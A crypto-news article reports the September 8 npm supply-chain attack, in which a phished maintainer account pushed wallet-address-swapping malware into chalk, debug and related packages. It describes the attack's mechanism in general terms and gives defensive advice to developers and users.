Categories: MarketsMenafn

Massive NPM Supply-Chain Attack Exposes Crypto Wallets to Theft in Bold Phishing Scheme

The JavaScript ecosystem was hit by one of its biggest supply-chain incidents on Sept. 8, when a phished maintainer account pushed malicious updates to at least 18–20 popular npm packages, including chalk and debug, that collectively see ~2 billion weekly downloads.

The payload targeted crypto users by intercepting on-page wallet calls and swapping destination addresses.

How it happened

Investigators say the attacker impersonated npm support using the npmjs.help domain and a fake 2FA reset workflow to seize the account of prolific maintainer Qix (Josh Junon).

With access, the actor rapidly published tainted versions across a cluster of utilities (e.g., ansi-regex, strip-ansi, supports-color, wrap-ansi), before the breach was spotted and reversions began. Qix acknowledged the compromise publicly and said cleanup was underway.

Why crypto was in the crosshairs

The malware only activates in the browser. It checks for window, then hooks window.fetch, XMLHttpRequest, and Web3 wallet APIs like window.ethereum.request.

From there, it rewrites the recipient address to a look-alike using Levenshtein matching, a classic “clipper” move aimed at draining wallets on dapps and exchange front-ends.

The campaign broadened

Within hours, the same wallet-drainer surfaced via a second compromised maintainer, extending risk to packages such as @duckdb/node-api, duckdb, and prebid. That expansion underscores the blast radius when trusted publishers are hijacked.

Crypto Industry response

Ledger CTO Charles Guillemet warned users that the malware swaps addresses silently and urged on-device verification (clear-signing) before approving any transaction.

Security firms have published technical breakdowns and IOCs, while maintainers have reverted or deprecated bad builds. Separately, but relevant for risk posture, the Aug. 26 “s1ngularity”/Nx incident leaked developer secrets via compromised npm releases, illustrating how stolen tokens can seed follow-on package takeovers like this week’s wave.

What it means for web3 teams & users

  • If you build dapps or wallet UIs: Audit lockfiles for the exact bad versions listed in current advisories; rebuild from clean pins, purge caches/CDNs, and redeploy. Search bundles for code that hooks network calls or wallet APIs and alters addresses.

  • If you’re a crypto user: Prefer a hardware wallet and confirm the on-device address matches what you intended before signing.

  • For security/ops: Rotate npm/GitHub/CI tokens touched during the window; review recent installs and release pipelines. If you use Nx, follow the remediation steps in Aikido’s write-up.

Bottom line: This is likely the largest npm supply-chain hack to date, and its design expressly targets crypto transactions at the UI layer. Keeping users safe now hinges on rapid rebuilds, strict dependency pinning, and verifying every on-chain action at the hardware wallet screen.

Jerry Rolon

After working for 7 years as a Internet Marketer, Jerry now aims to explore the journalistic side of Internet. With his impeccable knowledge in this domain, he churns out some of the best news articles from the internet niche. With respect to acedamics, Jerry earned a degree in business from California State University.

Recent Posts

Zcash Surges on Privacy Bets

Zcash (ZEC) has erupted past key resistance levels this week, driven by surging derivatives flows…

14 hours ago

Permute Surpasses $1M in Transaction Volume in One Month Since Launch

Bangalore, India, 2nd October 2025, ZEX PR WIRE, Permute, an accessible Bitcoin bridge platform, announced…

1 day ago

Codego Launches Whitelabel Devices Bringing Tokens Into Daily Life

Milan, Italy, 2nd October 2025, ZEX PR WIRE, Codego Group recently disclosed that its Whitelabel…

1 day ago

QMMM SEC Trading Suspension After Crypto Pivot

The U.S. Securities and Exchange Commission has suspended trading in QMMM Holdings Ltd. after weeks…

2 days ago

From Broken Models to Aligned Trading: Afterprime’s Pay-to-Trade Shift

Brokers profit when clients lose — Afterprime 2.0 ends that conflict with the world’s first…

2 days ago

Altseason Watch As Altcoin Share Surges On Binance

Bitcoin’s market share fell to about 57 percent in September, according to Binance Research’s Monthly…

3 days ago